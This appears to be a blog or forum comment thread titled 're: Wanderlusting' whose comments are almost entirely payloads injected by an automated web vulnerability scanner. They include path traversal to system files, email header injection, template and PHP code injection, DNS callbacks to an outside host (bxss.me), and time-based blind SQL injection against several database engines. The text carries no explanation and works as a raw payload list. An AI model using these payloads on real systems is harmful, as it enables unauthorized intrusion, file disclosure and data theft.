/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-14506.67.5ceaa.19990.2@bxss.me
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
${9999493+9999398}
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
)
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
'.gethostbyname(lc('hittr'.'mohfusdhd98e1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(67).chr(103).chr(81).'
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
".gethostbyname(lc("hitwu"."flmaxvob39e91.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(118).chr(81)."
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
/etc/shells
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
bxss.me
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(97).concat(82).concat(107).concat(71)+(require"socket"
Socket.gethostbyname("hitvo"+"atcfocbsc8214.bxss.me.")[3].to_s)+"
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(102).concat(86).concat(103).concat(68)+(require'socket'
Socket.gethostbyname('hithr'+'ogvhyjxy36919.bxss.me.')[3].to_s)+'
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
'"
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
<!--
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+860-860-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+860-860-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+174-174-1=0+0+0+1
re: Wanderlusting
-1 OR 3+174-174-1=0+0+0+1
re: Wanderlusting
-1' OR 2+394-394-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+394-394-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+578-578-1=0+0+0+1 or 'P74JArIO'='
re: Wanderlusting
-1' OR 3+578-578-1=0+0+0+1 or 'P74JArIO'='
re: Wanderlusting
-1" OR 2+901-901-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+901-901-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
slIuR6GX'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: Wanderlusting
WWfW7bLJ' OR 401=(SELECT 401 FROM PG_SLEEP(15))--
re: Wanderlusting
6PmtQDMQ') OR 307=(SELECT 307 FROM PG_SLEEP(15))--
re: Wanderlusting
zbmSGHt6')) OR 126=(SELECT 126 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@NAwf7